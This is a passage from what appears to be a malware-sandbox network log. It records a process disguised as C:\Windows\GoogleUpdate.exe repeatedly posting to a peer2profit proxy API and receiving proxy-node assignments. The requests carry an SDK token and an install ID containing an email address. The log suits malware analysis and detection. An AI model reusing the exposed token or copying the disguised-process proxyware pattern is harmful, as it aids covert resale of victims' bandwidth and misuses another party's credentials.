"0.8", "agent": "1.07.02"}
2022-11-26 10:18:28 UTC	2480	IN	HTTP/1.1 200 OK Date: Sat, 26 Nov 2022 10:18:28 GMT Content-Type: application/json Content-Length: 131 Connection: close CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 7701e1573eb4bb86-FRA
2022-11-26 10:18:28 UTC	2480	IN	Data Raw: 7b 0a 20 20 20 20 22 73 74 61 74 75 73 22 3a 20 22 53 55 43 43 45 53 53 22 2c 0a 20 20 20 20 22 64 61 74 61 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 22 6e 6f 64 65 22 3a 20 22 35 31 2e 36 38 2e 31 37 31 2e 32 34 39 22 2c 0a 20 20 20 20 20 20 20 20 22 70 6f 72 74 22 3a 20 34 34 33 2c 0a 20 20 20 20 20 20 20 20 22 70 65 65 72 5f 69 64 22 3a 20 32 33 39 34 31 37 30 31 38 0a 20 20 20 20 7d 0a 7d Data Ascii: { "status": "SUCCESS", "data": { "node": "51.68.171.249", "port": 443, "peer_id": 239417018 }}

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
21	192.168.2.5	49769	172.66.43.60	443	C:\Windows\GoogleUpdate.exe

Timestamp	kBytes transferred	Direction	Data
2022-11-26 10:18:29 UTC	2481	OUT	POST /api/proxy/nodes/get HTTP/1.1 Content-Type: application/json User-Agent: Microsoft Internet Explorer Host: api.peer2profit.com Content-Length: 186 Cache-Control: no-cache
2022-11-26 10:18:29 UTC	2481	OUT	Data Raw: 7b 22 74 6f 6b 65 6e 22 3a 20 22 53 44 4b 5f 48 4e 78 4c 69 6f 73 52 4f 62 7a 37 58 54 4f 61 5a 38 62 48 45 34 65 4d 57 41 7a 67 41 76 39 32 36 6a 61 53 48 38 72 37 35 4e 42 76 48 61 55 4c 4b 79 53 39 64 77 75 56 22 2c 20 22 69 6e 73 74 61 6c 6c 69 64 22 3a 20 22 50 32 50 5f 57 49 4e 5f 64 30 36 65 64 36 33 35 2d 36 38 66 36 2d 34 65 39 61 2d 39 35 35 63 2d 34 38 39 39 66 35 66 35 37 62 39 61 5f 6e 65 6f 64 6f 2e 76 69 6d 40 6d 61 69 6c 2e 72 75 22 2c 20 22 76 65 72 22 3a 20 22 30 2e 38 22 2c 20 22 61 67 65 6e 74 22 3a 20 22 31 2e 30 37 2e 30 32 22 7d Data Ascii: {"token": "SDK_HNxLiosRObz7XTOaZ8bHE4eMWAzgAv926jaSH8r75NBvHaULKyS9dwuV", "installid": "P2P_WIN_d06ed635-68f6-4e9a-955c-4899f5f57b9a_neodo.vim@mail.ru", "ver": "0.8", "agent": "1.07.02"}
2022-11-26 10:18:29 UTC	2481	IN	HTTP/1.1 200 OK Date: Sat, 26 Nov 2022 10:18:29 GMT Content-Type: application/json Content-Length: 131 Connection: close CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 7701e15db80b91e9-FRA
2022-11-26 10:18:29 UTC	2481	IN	Data Raw: 7b 0a 20 20 20 20 22 73 74 61 74 75 73 22 3a 20 22 53 55 43 43 45 53 53 22 2c 0a 20 20 20 20 22 64 61 74 61 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 22 6e 6f 64 65 22 3a 20 22 35 31 2e 36 38 2e 31 37 31 2e 32 34 39 22 2c 0a 20 20 20 20 20 20 20 20 22 70 6f 72 74 22 3a 20 34 34 33 2c 0a 20 20 20 20 20 20 20 20 22 70 65 65 72 5f 69 64 22 3a 20 32 33 39 34 31 37 30 31 38 0a 20 20 20 20 7d 0a 7d Data Ascii: { "status": "SUCCESS", "data": { "node": "51.68.171.249", "port": 443, "peer_id": 239417018 }}

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
22	192.168.2.5	49771	172.66.43.60	443	C:\Windows\GoogleUpdate.exe

Timestamp	kBytes transferred	Direction	Data
2022-11-26 10:18:29 UTC	2481	OUT	POST /api/proxy/nodes/get HTTP/1.1 Content-Type: application/json User-Agent: Microsoft Internet Explorer Host: api.peer2profit.com Content-Length: 186 Cache-Control: no-cache
2022-11-26 10:18:29 UTC	2481	OUT	Data Raw: 7b 22 74 6f 6b 65 6e 22 3a 20 22 53 44 4b 5f 48 4e 78 4c 69 6f 73 52 4f 62 7a 37 58 54 4f 61 5a 38 62 48 45 34 65 4d 57 41 7a 67 41 76 39 32 36 6a 61 53 48 38 72 37 35 4e 42 76 48 61 55 4c 4b 79 53 39 64 77 75 56 22 2c 20 22 69 6e 73 74 61 6c 6c 69 64 22 3a 20 22 50 32 50 5f 57 49 4e 5f 64 30 36 65 64 36 33 35 2d 36 38 66 36 2d 34 65 39 61 2d 39 35 35 63 2d 34 38 39 39 66 35 66 35 37 62 39 61 5f 6e 65 6f 64 6f 2e 76 69 6d 40 6d 61 69 6c 2e 72 75 22 2c 20 22 76 65 72 22 3a 20 22 30 2e 38 22 2c 20 22 61 67 65 6e 74 22 3a 20 22 31 2e 30 37 2e 30 32 22 7d Data Ascii: {"token": "SDK_HNxLiosRObz7XTOaZ8bHE4eMWAzgAv926jaSH8r75NBvHaULKyS9dwuV", "installid": "P2P_WIN_d06ed635-68f6-4e9a-955c-4899f5f57b9a_neodo.vim@mail.ru", "ver": "0.8", "agent": "1.07.02"}
2022-11-26 10:18:29 UTC	2482	IN	HTTP/1.1 200 OK Date: Sat, 26 Nov 2022 10:18:29 GMT Content-Type: application/json Content-Length: 131 Connection: close CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 7701e15f9e5a913a-FRA
2022-11-26 10:18:29 UTC	2482	IN	Data Raw: 7b 0a 20 20 20 20 22 73 74 61 74 75 73 22 3a 20 22 53 55 43 43 45 53 53 22 2c 0a 20 20 20 20 22 64 61 74 61 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 22 6e 6f 64 65 22 3a 20 22 35 31 2e 36 38 2e 31 37 31 2e 32 34 39 22 2c 0a 20 20 20 20 20 20 20 20 22 70 6f 72 74 22 3a 20 34 34 33 2c 0a 20 20 20 20 20 20 20 20 22 70 65 65 72 5f 69 64 22 3a 20 32 33 39 34 31 37 30 31 38 0a 20 20 20 20 7d 0a 7d Data Ascii: { "status": "SUCCESS", "data": { "node": "51.68.171.249", "port": 443, "peer_id": 239417018 }}

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
23	192.168.2.5	49774	172.66.43.60	443	C:\Windows\GoogleUpdate.exe

Timestamp	kBytes transferred	Direction	Data
2022-11-26 10:18:29 UTC	2482	OUT	POST /api/proxy/nodes/get HTTP/1.1 Content-Type: application/json User-Agent: Microsoft Internet Explorer Host: api.peer2profit.com Content-Length: 186 Cache-Control: no-cache
2022-11-26 10:18:29 UTC	2482	OUT	Data Raw: 7b 22 74 6f 6b 65 6e 22 3a 20 22 53 44 4b 5f 48 4e 78 4c 69 6f 73 52 4f 62 7a 37 58 54 4f 61 5a 38 62 48 45 34 65 4d 57 41 7a 67 41 76 39 32 36 6a 61 53 48 38 72 37 35 4e 42 76 48 61 55 4c 4b 79 53 39 64 77 75 56 22 2c 20 22 69 6e 73 74 61 6c 6c 69 64 22 3a 20 22 50 32 50 5f 57 49 4e 5f 64 30 36 65 64 36 33 35 2d 36 38 66 36 2d 34 65 39 61 2d 39 35 35 63 2d 34 38 39 39 66 35 66 35 37 62 39 61 5f 6e 65 6f 64 6f 2e 76 69 6d 40 6d 61 69 6c 2e 72 75 22 2c 20 22 76 65 72 22 3a 20 22 30 2e 38 22 2c 20 22 61 67 65 6e 74 22 3a 20 22 31 2e 30 37 2e 30 32 22 7d Data Ascii: {"token": "SDK_HNxLiosRObz7XTOaZ8bHE4eMWAzgAv926jaSH8r75NBvHaULKyS9dwuV", "installid": "P2P_WIN_d06ed635-68f6-4e9a-955c-4899f5f57b9a_neodo.vim@mail.ru", "ver": "0.8", "agent": "1.07.02"}
2022-11-26 10:18:30 UTC	2482	IN	HTTP/1.1 200 OK Date: Sat, 26 Nov 2022 10:18:30 GMT Content-Type: application/json Content-Length: 131 Connection: close CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 7701e161acc8918f-FRA
2022-11-26 10:18:30 UTC	2483	IN	Data Raw: 7b 0a 20 20 20 20 22 73 74 61 74 75 73 22 3a 20 22 53 55 43 43 45 53 53 22 2c 0a 20 20 20 20 22 64 61 74 61 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 22 6e 6f 64 65 22 3a 20 22 35 31 2e 36 38 2e 31 37 31 2e 32 34 39 22 2c 0a 20 20 20 20 20 20 20 20 22 70 6f 72 74 22 3a 20 34 34 33 2c 0a 20 20 20 20 20 20 20 20 22 70 65 65 72 5f 69 64 22 3a 20 32 33 39 34 31 37 30 31 38 0a 20 20 20 20 7d 0a 7d Data Ascii: { "status": "SUCCESS", "data": { "node": "51.68.171.249", "port": 443, "peer_id": 239417018 }}

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
24	192.168.2.5	49777	172.66.43.60	443	C:\Windows\GoogleUpdate.exe

Timestamp	kBytes transferred	Direction	Data
2022-11-26 10:18:31 UTC	2483	OUT	POST /api/proxy/nodes/get HTTP/1.1 Content-Type: application/json User-Agent: Microsoft Internet Explorer Host: api.peer2profit.com Content-Length: 186 Cache-Control: no-cache
2022-11-26 10:18:31 UTC	2483	OUT	Data Raw: 7b 22 74 6f 6b 65 6e 22 3a 20 22 53 44 4b 5f 48 4e 78 4c 69 6f 73 52 4f 62 7a 37 58 54 4f 61 5a 38 62 48 45 34 65 4d 57 41 7a 67 41 76 39 32 36 6a 61 53 48 38 72 37 35 4e 42 76 48 61 55 4c 4b 79 53 39 64 77 75 56 22 2c 20 22 69 6e 73 74 61 6c 6c 69 64 22 3a 20 22 50 32 50 5f 57 49 4e 5f 64 30 36 65 64 36 33 35 2d 36 38 66 36 2d 34 65 39 61 2d 39 35 35 63 2d 34 38 39 39 66 35 66 35 37 62 39 61 5f 6e 65 6f 64 6f 2e 76 69 6d 40 6d 61 69 6c 2e 72 75 22 2c 20 22 76 65 72 22 3a 20 22 30 2e 38 22 2c 20 22 61 67 65 6e 74 22 3a 20 22 31 2e 30 37 2e 30 32 22 7d Data Ascii: {"token": "SDK_HNxLiosRObz7XTOaZ8bHE4eMWAzgAv926jaSH8r75NBvHaULKyS9dwuV", "installid": "P2P_WIN_d06ed635-68f6-4e9a-955c-4899f5f57b9a_neodo.vim@mail.ru", "ver": "0.8", "agent": "1.07.02"}
2022-11-26 10:18:31 UTC	2483	IN	HTTP/1.1 200 OK Date: Sat, 26 Nov 2022 10:18:31 GMT Content-Type: application/json Content-Length: 131 Connection: close CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 7701e1690b2a91d5-FRA
2022-11-26 10:18:31 UTC	2483	IN	Data Raw: 7b 0a 20 20 20 20 22 73 74 61 74 75 73 22 3a 20 22 53 55 43 43 45 53 53 22 2c 0a 20 20 20 20 22 64 61 74 61 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 22 6e 6f 64 65 22 3a 20 22 35 31 2e 36 38 2e 31 37 31 2e 32 34 39 22 2c 0a 20 20 20 20 20 20 20 20 22 70 6f 72 74 22 3a 20 34 34 33 2c 0a 20 20 20 20 20 20 20 20 22 70 65 65 72 5f 69 64 22 3a 20 32 33 39 34 31 37 30 31 38 0a 20 20 20 20 7d 0a 7d Data Ascii: { "status": "SUCCESS", "data": { "node": "51.68.171.249", "port": 443, "peer_id": 239417018 }}

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
25	192.168.2.5	49780	172.66.43.60	443	C:\Windows\GoogleUpdate.exe

Timestamp	kBytes transferred	Direction	Data
2022-11-26 10:18:33 UTC	2483	OUT	POST /api/proxy/nodes/get HTTP/1.1 Content-Type: application/json User-Agent: Microsoft Internet Explorer Host: api.peer2profit.com Content-Length: 186 Cache-Control: no-cache
2022-11-26 10:18:33 UTC	2484	OUT	Data Raw: 7b 22 74 6f 6b 65 6e 22 3a 20 22 53 44 4b 5f 48 4e 78 4c 69 6f 73 52 4f 62 7a 37 58 54 4f 61 5a 38 62 48 45 34 65 4d 57 41 7a 67 41 76 39 32 36 6a 61 53 48 38 72 37 35 4e 42 76 48 61 55 4c 4b 79 53 39 64 77 75 56 22 2c 20 22 69 6e 73 74 61 6c 6c 69 64 22 3a 20 22 50 32 50 5f 57 49 4e 5f 64 30 36 65 64 36 33 35 2d 36 38 66 36 2d 34 65 39 61 2d 39 35 35 63 2d 34 38 39 39 66 35 66 35 37 62 39 61 5f 6e 65 6f 64 6f 2e 76 69 6d 40 6d 61 69 6c 2e 72 75 22 2c 20 22 76 65 72 22 3a 20 22 30 2e 38 22 2c 20 22 61 67 65 6e 74 22 3a 20 22 31 2e 30 37 2e 30 32 22 7d Data Ascii: {"token": "SDK_HNxLiosRObz7XTOaZ8bHE4eMWAzgAv926jaSH8r75NBvHaULKyS9dwuV", "installid": "P2P_WIN_d06ed635-68f6-4e9a-955c-4899f5f57b9a_neodo.vim@mail.ru", "ver": "0.8", "agent": "1.07.02"}
2022-11-26 10:18:33 UTC	2484	IN	HTTP/1.1 200 OK Date: Sat, 26 Nov 2022 10:18:33 GMT Content-Type: application/json Content-Length: 131 Connection: close CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 7701e1795d0f9a33-FRA
2022-11-26 10:18:33 UTC	2484	IN	Data Raw: 7b 0a 20 20 20 20 22 73 74 61 74 75 73 22 3a 20 22 53 55 43 43 45 53 53 22 2c 0a 20 20 20 20 22 64 61 74 61 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 22 6e 6f 64 65 22 3a 20 22 35 31 2e 36 38 2e 31 37 31 2e 32 34 39 22 2c 0a 20 20 20 20 20 20 20 20 22 70 6f 72 74 22 3a 20 34 34 33 2c 0a 20 20 20 20 20 20 20 20 22 70 65 65 72 5f 69 64 22 3a 20 32 33 39 34 31 37 30 31 38 0a 20 20 20 20 7d 0a 7d Data Ascii: { "status": "SUCCESS", "data": { "node": "51.68.171.249", "port": 443, "peer_id": 239417018 }}

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
26	192.168.2.5	49783	172.66.43.60	443	C:\Windows\GoogleUpdate.exe

Timestamp	kBytes transferred	Direction	Data
2022-11-26 10:18:35 UTC	2484	OUT	POST /api/proxy/nodes/get HTTP/1.1 Content-Type: application/json User-Agent: Microsoft Internet Explorer Host: api.peer2profit.com Content-Length: 186 Cache-Control: no-cache
2022-11-26 10:18:35 UTC	2484	OUT	Data Raw: 7b 22 74 6f 6b 65 6e 22 3a 20 22 53 44 4b 5f 48 4e 78 4c 69 6f 73 52 4f 62 7a 37 58 54 4f 61 5a 38 62 48 45 34 65 4d 57 41 7a 67 41 76 39 32 36 6a 61 53 48 38 72 37 35 4e 42 76 48 61 55 4c 4b 79 53 39 64 77 75 56 22 2c 20 22 69 6e 73 74 61 6c 6c 69 64 22 3a 20 22 50 32 50 5f 57 49 4e 5f 64 30 36 65 64 36 33 35 2d 36 38 66 36 2d 34 65 39 61 2d 39 35 35 63 2d 34 38 39 39 66 35 66 35 37 62 39 61 5f 6e 65 6f 64 6f 2e 76 69 6d 40 6d 61 69 6c 2e 72 75 22 2c 20 22 76 65 72 22 3a 20 22 30 2e 38 22 2c 20 22 61 67 65 6e 74 22 3a 20 22 31 2e 30 37 2e 30 32 22 7d Data Ascii: {"token": "SDK_HNxLiosRObz7XTOaZ8bHE4eMWAzgAv926jaSH8r75NBvHaULKyS9dwuV", "installid": "P2P_WIN_d06ed635-68f6-4e9a-955c-4899f5f57b9a_neodo.vim@mail.ru", "ver": "0.8", "agent": "1.07.02"}
2022-11-26 10:18:35 UTC	2484	IN	HTTP/1.1 200 OK Date: Sat, 26 Nov 2022 10:18:35 GMT Content-Type: application/json Content-Length: 131 Connection: close CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 7701e1838c098fe2-FRA
2022-11-26 10:18:35 UTC	2485	IN	Data Raw: 7b 0a 20 20 20 20 22 73 74 61 74 75 73 22 3a 20 22 53 55 43 43 45 53 53 22 2c 0a 20 20 20 20 22 64 61 74 61 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 22 6e 6f 64 65 22 3a 20 22 35 31 2e 36 38 2e 31 37 31 2e 32 34 39 22 2c 0a 20 20 20 20 20 20 20 20 22 70 6f 72 74 22 3a 20 34 34 33 2c 0a 20 20 20 20 20 20 20 20 22 70 65 65 72 5f 69 64 22 3a 20 32 33 39 34 31 37 30 31 38 0a 20 20 20 20 7d 0a 7d Data Ascii: { "status": "SUCCESS", "data": { "node": "51.68.171.249", "port": 443, "peer_id": 239417018 }}

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
27	192.168.2.5	49786	172.66.43.60	443	C:\Windows\GoogleUpdate.exe

Timestamp	kBytes transferred	Direction	Data
2022-11-26 10:18:36 UTC	2485	OUT	POST /api/proxy/nodes/get HTTP/1.1 Content-Type: application/json User-Agent: Microsoft Internet Explorer Host: api.peer2profit.com Content-Length: 186 Cache-Control: no-cache
2022-11-26 10:18:36 UTC	2485	OUT	Data Raw: 7b 22 74 6f 6b 65 6e 22 3a 20 22 53 44 4b 5f 48 4e 78 4c 69 6f 73 52 4f 62 7a 37 58 54 4f 61 5a 38 62 48 45 34 65 4d 57 41 7a 67 41 76 39 32 36 6a 61 53 48 38 72 37 35 4e 42 76 48 61 55 4c 4b 79 53 39 64 77 75 56 22 2c 20 22 69 6e 73 74 61 6c 6c 69 64 22 3a 20 22 50 32 50 5f 57 49 4e 5f 64 30 36 65 64 36 33 35 2d 36 38 66 36 2d 34 65 39 61 2d 39 35 35 63 2d 34 38 39 39 66 35 66 35 37 62 39 61 5f 6e 65 6f 64 6f 2e 76 69 6d 40 6d 61 69 6c 2e 72 75 22 2c 20 22 76 65 72 22 3a 20 22 30 2e 38 22 2c 20 22 61 67 65 6e 74 22 3a 20 22 31 2e 30 37 2e 30 32 22 7d Data Ascii: {"token": "SDK_HNxLiosRObz7XTOaZ8bHE4eMWAzgAv926jaSH8r75NBvHaULKyS9dwuV", "installid": "P2P_WIN_d06ed635-68f6-4e9a-955c-4899f5f57b9a_neodo.vim@mail.ru", "ver": "0.8", "agent": "1.07.02"}
2022-11-26 10:18:36 UTC	2485	IN	HTTP/1.1 200 OK Date: Sat, 26 Nov 2022 10:18:36 GMT Content-Type: application/json Content-Length: 131 Connection: close CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 7701e1894d699b67-FRA
2022-11-26 10:18:36 UTC	2485	IN	Data Raw: 7b 0a 20 20 20 20 22 73 74 61 74 75 73 22 3a 20 22 53 55 43 43 45 53 53 22 2c 0a 20 20 20 20 22 64 61 74 61 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 22 6e 6f 64 65 22 3a 20 22 35 31 2e 36 38 2e 31 37 31 2e 32 34 39 22 2c 0a 20 20 20 20 20 20 20 20 22 70 6f 72 74 22 3a 20 34 34 33 2c 0a 20 20 20 20 20 20 20 20 22 70 65 65 72 5f 69 64 22 3a 20 32 33 39 34 31 37 30 31 38 0a 20 20 20 20 7d 0a 7d Data Ascii: { "status": "SUCCESS", "data": { "node": "51.68.171.249", "port": 443, "peer_id": 239417018 }}

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
28	192.168.2.5	49789	172.66.43.60	443	C:\Windows\GoogleUpdate.exe

Timestamp	kBytes transferred	Direction	Data
2022-11-26 10:18:36 UTC	2485	OUT	POST /api/proxy/nodes/get HTTP/1.1 Content-Type: application/json User-Agent: Microsoft Internet Explorer Host: api.peer2profit.com Content-Length: 186 Cache-Control: no-cache
2022-11-26 10:18:36 UTC	2486	OUT	Data Raw: 7b 22 74 6f 6b 65 6e 22 3a 20 22 53 44 4b 5f 48 4e 78 4c 69 6f 73 52 4f 62 7a 37 58 54 4f 61 5a 38 62 48 45 34 65 4d 57 41 7a 67 41 76 39 32 36 6a 61 53 48 38 72 37 35 4e 42 76 48 61 55 4c 4b 79 53 39 64 77 75 56 22 2c 20 22 69 6e 73 74 61 6c 6c 69 64 22 3a 20 22 50 32 50 5f 57 49 4e 5f 64 30 36 65 64 36 33 35 2d 36 38 66 36 2d 34 65 39 61 2d 39 35 35 63 2d 34 38 39 39 66 35 66 35 37 62 39 61 5f 6e 65 6f 64 6f 2e 76 69 6d 40 6d 61 69 6c 2e 72 75 22 2c 20 22 76 65 72 22 3a 20 22 30 2e 38 22 2c 20 22 61 67 65 6e 74 22 3a 20 22 31 2e 30 37 2e 30 32 22 7d Data Ascii: {"token": "SDK_HNxLiosRObz7XTOaZ8bHE4eMWAzgAv926jaSH8r75NBvHaULKyS9dwuV", "installid": "P2P_WIN_d06ed635-68f6-4e9a-955c-4899f5f57b9a_neodo.vim@mail.ru", "ver": "0.8", "agent": "1.07.02"}
2022-11-26 10:18:36 UTC	2486	IN	HTTP/1.1 200 OK Date: Sat, 26 Nov 2022 10:18:36 GMT Content-Type: application/json Content-Length: 131 Connection: close CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 7701e18b6d989963-FRA
2022-11-26 10:18:36 UTC	2486	IN	Data Raw: 7b 0a 20 20 20 20 22 73 74 61 74 75 73 22 3a 20 22 53 55 43 43 45 53 53 22 2c 0a 20 20 20 20 22 64 61 74 61 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 22 6e 6f 64 65 22 3a 20 22 35 31 2e 36 38 2e 31 37 31 2e 32 34 39 22 2c 0a 20 20 20 20 20 20 20 20 22 70 6f 72 74 22 3a 20 34 34 33 2c 0a 20 20 20 20 20 20 20 20 22 70 65 65 72 5f 69 64 22 3a 20 32 33 39 34 31 37 30 31 38 0a 20 20 20 20 7d 0a 7d Data Ascii: { "status": "SUCCESS", "data": { "node": "51.68.171.249", "port": 443, "peer_id": 239417018 }}

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
29	192.168.2.5	49792	172.66.43.60	443	C:\Windows\GoogleUpdate.exe

Timestamp	kBytes transferred	Direction	Data
2022-11-26 10:18:36 UTC	2486	OUT	POST /api/proxy/nodes/get HTTP/1.1 Content-Type: application/json User-Agent: Microsoft Internet Explorer Host: api.peer2profit.com Content-Length: 186 Cache-Control: no-cache
2022-11-26 10:18:36 UTC	2486	OUT	Data Raw: 7b 22 74 6f 6b 65 6e 22 3a 20 22 53 44 4b 5f 48 4e 78 4c 69 6f 73 52 4f 62 7a 37 58 54 4f 61 5a 38 62 48 45 34 65 4d 57 41 7a 67 41 76 39 32 36 6a 61 53 48 38 72 37 35 4e 42 76 48 61 55 4c 4b 79 53 39 64 77 75 56 22 2c 20 22 69 6e 73 74 61 6c 6c 69 64 22 3a 20 22 50 32 50 5f 57 49 4e 5f 64 30 36 65 64 36 33 35 2d 36 38 66 36 2d 34 65 39 61 2d 39 35 35 63 2d 34 38 39 39 66 35 66 35 37 62 39 61 5f 6e 65 6f 64 6f 2e 76 69 6d 40 6d 61 69 6c 2e 72 75 22 2c 20 22 76 65 72 22 3a 20 22 30 2e 38 22 2c 20 22 61 67 65 6e 74 22 3a 20 22 31 2e 30 37 2e 30 32 22 7d Data Ascii: {"token": "SDK_HNxLiosRObz7XTOaZ8bHE4eMWAzgAv926jaSH8r75NBvHaULKyS9dwuV", "installid": "P2P_WIN_d06ed635-68f6-4e9a-955c-4899f5f57b9a_neodo.vim@mail.ru", "ver": "0.8", "agent": "1.07.02"}
2022-11-26 10:18:37 UTC	2486	IN	HTTP/1.1 200 OK Date: Sat, 26 Nov 2022 10:18:37 GMT Content-Type: application/json Content-Length: 131 Connection: close CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 7701e18d69ca9bee-FRA
2022-11-26 10:18:37 UTC	2487	IN	Data Raw: 7b 0a 20 20 20 20 22 73 74 61 74 75 73 22 3a 20 22 53 55 43 43 45 53 53 22 2c 0a 20 20 20 20 22 64 61 74 61 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 22 6e 6f 64 65 22 3a 20 22 35 31 2e 36 38 2e 31 37 31 2e 32 34 39 22 2c 0a 20 20 20 20 20 20 20 20 22 70 6f 72 74 22 3a 20 34 34 33 2c 0a 20 20 20 20 20 20 20 20 22 70 65 65 72 5f 69 64 22 3a 20 32 33 39 34 31 37 30 31 38 0a 20 20 20 20 7d 0a 7d Data Ascii: { "status": "SUCCESS", "data": { "node": "51.68.171.249", "port": 443, "peer_id": 239417018 }}

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.2.5	49717	172.66.43.60	443	C:\Windows\GoogleUpdate.exe

Timestamp	kBytes transferred	Direction	Data
2022-11-26 10:18:12 UTC	2468	OUT	POST /api/proxy/nodes/get HTTP/1.1 Content-Type: application/json User-Agent: Microsoft Internet Explorer Host: api.peer2profit.com Content-Length: 186 Cache-Control: no-cache
2022-11-26 10:18:12 UTC	2468	OUT	Data Raw: 7b 22 74 6f 6b 65 6e 22 3a 20 22 53 44 4b 5f 48 4e 78 4c 69 6f 73 52 4f 62 7a 37 58 54 4f 61 5a 38 62 48 45 34 65 4d 57 41 7a 67 41 76 39 32 36 6a 61 53 48 38 72 37 35 4e 42 76 48 61 55 4c 4b 79 53 39 64 77 75 56 22 2c 20 22 69 6e 73 74 61 6c 6c 69 64 22 3a 20 22 50 32 50 5f 57 49 4e 5f 64 30 36 65 64 36 33 35 2d 36 38 66 36 2d 34 65 39 61 2d 39 35 35 63 2d 34 38 39 39 66 35 66 35 37 62 39 61 5f 6e 65 6f 64 6f 2e 76 69 6d 40 6d 61 69 6c 2e 72 75 22 2c 20 22 76 65 72 22 3a 20 22 30 2e 38 22 2c 20 22 61 67 65 6e 74 22 3a 20 22 31 2e 30 37 2e 30 32 22 7d Data Ascii: {"token": "SDK_HNxLiosRObz7XTOaZ8bHE4eMWAzgAv926jaSH8r75NBvHaULKyS9dwuV", "installid": "P2P_WIN_d06ed635-68f6-4e9a-955c-4899f5f57b9a_neodo.vim@mail.ru", "ver": "0.8", "agent": "1.07.02"}
2022-11-26 10:18:12 UTC	2469	IN	HTTP/1.1 200 OK Date: Sat, 26 Nov 2022 10:18:12 GMT Content-Type: application/json Content-Length: 131 Connection: close CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 7701e0f18cbd90ef-FRA
2022-11-26 10:18:12 UTC	2469	IN	Data Raw: 7b 0a 20 20 20 20 22 73 74 61 74 75 73 22 3a 20 22 53 55 43 43 45 53 53 22 2c 0a 20 20 20 20 22 64 61 74 61 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 22 6e 6f 64 65 22 3a 20 22 35 31 2e 36 38 2e 31 37 31 2e 32 34 39 22 2c 0a 20 20 20 20 20 20 20 20 22 70 6f 72 74 22 3a 20 34 34 33 2c 0a 20 20 20 20 20 20 20 20 22 70 65 65 72 5f 69 64 22 3a 20 32 33 39 34 31 37 30 31 38 0a 20 20 20 20 7d 0a 7d Data Ascii: { "status": "SUCCESS", "data": { "node": "51.68.171.249", "port": 443, "peer_id": 239417018 }}

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
30	192.168.2.5	49796	172.66.43.60	443	C:\Windows\GoogleUpdate.exe

Timestamp	kBytes transferred	Direction	Data
2022-11-26 10:18:38 UTC	2487	OUT	POST /api/proxy/nodes/get HTTP/1.1 Content-Type: application/json User-Agent: Microsoft Internet Explorer Host: api.peer2profit.com Content-Length: 186 Cache-Control: no-cache
2022-11-26 10:18:38 UTC	2487	OUT	Data Raw: 7b 22 74 6f 6b 65 6e 22 3a 20 22 53 44 4b 5f 48 4e 78 4c 69 6f 73 52 4f 62 7a 37 58 54 4f 61 5a 38 62 48 45 34 65 4d 57 41 7a 67 41 76 39 32 36 6a 61 53 48 38 72 37 35 4e 42 76 48 61 55 4c 4b 79 53 39 64 77 75 56 22 2c 20 22 69 6e 73 74 61 6c 6c 69 64 22 3a 20 22 50 32 50 5f 57 49 4e 5f 64 30 36 65 64 36 33 35 2d 36 38 66 36 2d 34 65 39 61 2d 39 35 35 63 2d 34 38 39 39 66 35 66 35 37 62 39 61 5f 6e 65 6f 64 6f 2e 76 69 6d 40 6d 61 69 6c 2e 72 75 22 2c 20 22 76 65 72 22 3a 20 22 30 2e 38 22 2c 20 22 61 67 65 6e 74 22 3a 20 22 31 2e 30 37 2e 30 32 22 7d Data Ascii: {"token": "SDK_HNxLiosRObz7XTOaZ8bHE4eMWAzgAv926jaSH8r75NBvHaULKyS9dwuV", "installid": "P2P_WIN_d06ed635-68f6-4e9a-955c-4899f5f57b9a_neodo.vim@mail.ru", "ver": "0.8", "agent": "1.07.02"}
2022-11-26 10:18:38 UTC	2487	IN	HTTP/1.1 200 OK Date: Sat, 26 Nov 2022 10:18:38 GMT Content-Type: application/json Content-Length: 131 Connection: close CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 7701e196599f68f8-FRA
2022-11-26 10:18:38 UTC	2487	IN	Data Raw: 7b 0a 20 20 20 20 22 73 74 61 74 75 73 22 3a 20 22 53 55 43 43 45 53 53 22 2c 0a 20 20 20 20 22 64 61 74 61 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 22 6e 6f 64 65 22 3a 20 22 35 31 2e 36 38 2e 31 37 31 2e 32 34 39 22 2c 0a 20 20 20 20 20 20 20 20 22 70 6f 72 74 22 3a 20 34 34 33 2c 0a 20 20 20 20 20 20 20 20 22 70 65 65 72 5f 69 64 22 3a 20 32 33 39 34 31 37 30 31 38 0a 20 20 20 20 7d 0a 7d Data Ascii: { "status": "SUCCESS", "data": { "node": "51.68.171.249", "port": 443, "peer_id": 239417018 }}

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
31	192.168.2.5	49798	172.66.43.60	443	C:\Windows\GoogleUpdate.exe

Timestamp	kBytes transferred	Direction	Data
